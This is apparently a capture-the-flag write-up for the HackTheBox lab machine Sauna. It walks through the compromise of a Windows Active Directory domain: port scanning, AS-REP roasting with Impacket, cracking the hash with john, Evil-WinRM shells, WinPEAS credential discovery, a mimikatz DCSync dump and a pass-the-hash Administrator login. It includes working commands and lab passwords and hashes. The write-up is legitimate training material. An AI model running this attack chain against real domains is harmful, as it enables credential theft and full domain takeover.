# HackTheBox Sauna writeup

Sauna is a great machine for sharpening your Active Directory skills.

To solve this machine, you have to properly enumerate the domain, and with a pinch of `OSINT`, find the correct username.

The hash for the user might be captured by the `AS-REP Roasting` attack.

To get the `root` you have to escalate privileges by stepping aside to another account for the `DCSync` attack.

The machine itself is pretty similar to the Forest, I tried to use a slightly different toolkit.

# Toolkit

* [Impacket](https://github.com/SecureAuthCorp/impacket) for AS-REP Roasting
    
* [Evil-WinRM](https://github.com/Hackplayers/evil-winrm) to spawn shells and import scripts
    
* [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) for Privilege Escalation part
    
* [Mimikatz](https://github.com/gentilkiwi/mimikatz) for getting the Admin hash
    

---

# Enumeration

Checking all ports with `-p-` flag:

```bash
nmap -sS -sV -p- 10.10.10.175
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 15:41 EDT
Nmap scan report for htb.local (10.10.10.175)
Host is up (0.022s latency).
Not shown: 65515 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-29 02:48:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
64265/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/28%Time=5E7FA986%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 395.84 seconds
```

Exploring port `80` you have to find the list of users. That part is a bit CTF-ish, but you need to know the correct username to perform the AS-REP Roasting attack.

```bash
Fergus Smith
Shaun Coins
Bowie Taylor
Sophie Driver
Hugo Bear
Steven Kerb
```

From those names, we're creating a list with common patterns used in AD.

`Fergus Smith` might be represented as `fsmith`, or `Fergus.Smith`, or `FerSm`, etc.

# Exploitation

Firing up the `Impacket`

```bash
python3 GetNPUsers.py GOTISTICAL-BANK.LOCAL/ -usersfile users.txt -outputfile hash.txt -dc-ip 10.10.10.175 -no-pass
```

We go a `Kerberos` ticket for user `fsmith`:

```bash
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:caa59cf44d7cbdadfe91940e4a9433b0$c541f3fb39f017ee166fbb87d5c5c02578c8e9d993b30442f63e5d13be3bbc34e73616ea851a40fbea5ddab5a11ab41c0d3712b73755528fed1ae059e72ea21742e7309540a42d5cbd56fa4fca0d4f69935eadcbcee8bb9a6351cbeb0d27552be9da2e2fd6aa3e3106c4d808c8c5da9e5384f5b59ca907a137e889ae84c8d29a97616c59d8a3f92d2afd738ba2e1896011198eb374dfabfeaa6caa35c3c7b9fb01edaecd52d77e6305896e170c7432b450e799226baa99c23c87ea0c334cbcfb0c9fee5f7217009fb51068d32c94cee0f9ca115045712c9e5abd3d926cb77c25487e617ac09a478195d2f6f20b8264846263cebef81a9248d362eb7497f91a6c
```

Cracking this hash with `john`:

```bash
john --wordlist=./rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:18 DONE (2020-03-31 10:49) 0.05390g/s 568140p/s 568140c/s 568140C/s Thines..Thehulk2008
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

Get the user flag with the `Evil-WinRM`:

```bash
evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
```

---

# PrivEsc

One of my new favorite tools can handle the PrivEsc part - [WinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) `Windows Privilege Escalation Awesome Scripts` is a part of the toolkit named `PEASS - Privilege Escalation Awesome Scripts SUITE`

It can be easily imported by `Evin-WinRM` by `upload` function or by specifying `-e` flag when you're starting a shell.

`WinPEAS` discover some autologon credentials on the machine:

```bash
  [+] Looking for AutoLogon credentials(T1012)
    Some AutoLogon credentials were found!!
    DefaultDomainName             :  35mEGOTISTICALBANK
    DefaultUserName               :  35mEGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
```

Firing up another shell:

```bash
evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
```

It’s a great chance to try out a `mimikatz`. And again, `-e` or `upload` to pass the exploit to the machine:

```bash
./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"
```

`Mimikatz` will return the `NTLM hash` for user `Administrator`. The last step is to open another shell as the `Administrator`. `Evil-WinRM` have the `-H` flag, it’s the same as `Pass-the-Hash` attack:

```bash
evil-winrm -i 10.10.10.175 -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff
```
